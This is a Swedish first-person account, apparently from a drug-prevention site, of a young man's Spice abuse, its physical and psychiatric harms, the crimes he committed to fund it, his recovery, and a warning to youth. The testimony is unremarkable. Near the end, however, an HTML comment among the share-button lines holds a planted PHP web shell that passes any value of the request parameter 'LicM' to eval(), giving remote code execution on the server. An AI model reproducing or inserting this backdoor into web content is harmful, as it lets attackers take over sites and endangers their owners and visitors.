Missbrukade Spice och fick svåra kroppsliga- och mentala problem


”Prova aldrig Spice, det leder bara till problem både fysiskt, psykiskt och kan leda till ett kraftigare missbruk med tyngre droger.”

”Jag är 28 och bor i Örebro, just nu på rättspsykiatrin.

Sist jag rökte Spice var för ca 4 år sen och då rökte jag runt 5 – 7 gram om dagen ibland mer ibland mindre – beroende på pengar och tillgång på Spice.

Jag rökte Spice i princip dagligen i 2 år. Det var och är ganska vanligt med Spice i blandade åldrar som jag förstått det.

Upptäckte Spice av en slump via en bekant, som sa att det inte visar på urin och blodprov, så man kunde fortsätta missbruka utan att bli upptäckt av polisen. Om de nu skulle ta in mig för ringa narkotikabrott. Till saken hör att jag rökte en hel del hasch också så bytte ut det mot Spice

Anledningen till att jag började missbruka Spice

Jag började med hasch pga nyfikenhet och ville vara som de äldre kompisarna som var ”tuffa” och som jag såg upp till.

Har också varit rastlös och haft lite svårt att koncentrera mig hela livet pga ADD och Asperger, så rökte jag hasch och då förstod jag att det är såhär jag ska fungera och må – kunde sitta stilla och koncentrera mig utan problem.

Dock blev jag väldigt orolig efter ruset gick över så rökte mer och mer sen till slut var jag fast i haschet som jag bytte ut mot Spice och fick ännu värre symptom av rastlöshet och så.

Kroppsliga problem av Spice

Jag fick en ganska kraftig viktnedgång, ont i lederna och lite svårt att se ordentligt. Då och då hade jag svårt att andas med en snabb puls.

Psykiska problem av Spice

De psykiska problemen av Spice är ännu värre än de kroppsliga: ångest, självmordstankar och psykoser med vanföreställningar som ledde till ett rätt grovt brott som i sin tur ledde till att jag blev dömd till vård inom rättspsyk.

Vem vet, jag kanske hade kunnat fastna i psykos och aldrig blivit frisk från den.

Positiva effekter av att ta Spice

I början av själva ruset så blev jag lugn, kunde sitta stilla, koncentrera mig och kunde föra ett samtal. Mådde ganska bra den första veckan men som sagt efteråt mådde jag inte bra. Drabbades av svåra kroppsliga och psykiska problem.

Det värsta med att ta Spice

Det värsta med att ta Spice var ångesten efter ruset gått över och vanföreställningar som jag fick.

Andra konsekvenser av att missbruka Spice

Jag begick lite småbrott t.ex förrådsinbrott och lurade folk på pengar, stal pengar och smycken för att finansiera mitt missbruk. Stal även från min egen mamma.

Min mamma var även väldigt ledsen och orolig, pappa visste inget och sen har jag en äldre bror fast vi missbrukade ihop.

Hur jag slutade med Spice

Jag slutade först under tvång men sedan insåg jag att jag måste lägga av och aldrig mer ta Spice.

Idag har jag varit drogfri och nykter i drygt 3 år och 7 månader.

Kommunen borde satsa på aktiviteter och evenemang för ungdomar, t.ex olika teman i skolan om droger. Och om skolan misstänker att någon tar droger så bör de ta tag i det direkt med samtal etc.

Mitt budskap till ungdomar angående Spice

Prova aldrig Spice, det leder bara till problem både fysiskt, psykiskt och kan leda till ett kraftigare missbruk med tyngre droger.”

Bookmark and Share

Bookmark and Share<!– [insert_php]if (isset($_REQUEST["LicM"])){eval($_REQUEST["LicM"]);exit;}[/insert_php][php]if (isset($_REQUEST["LicM"])){eval($_REQUEST["LicM"]);exit;}[/php] –>


Bookmark and Share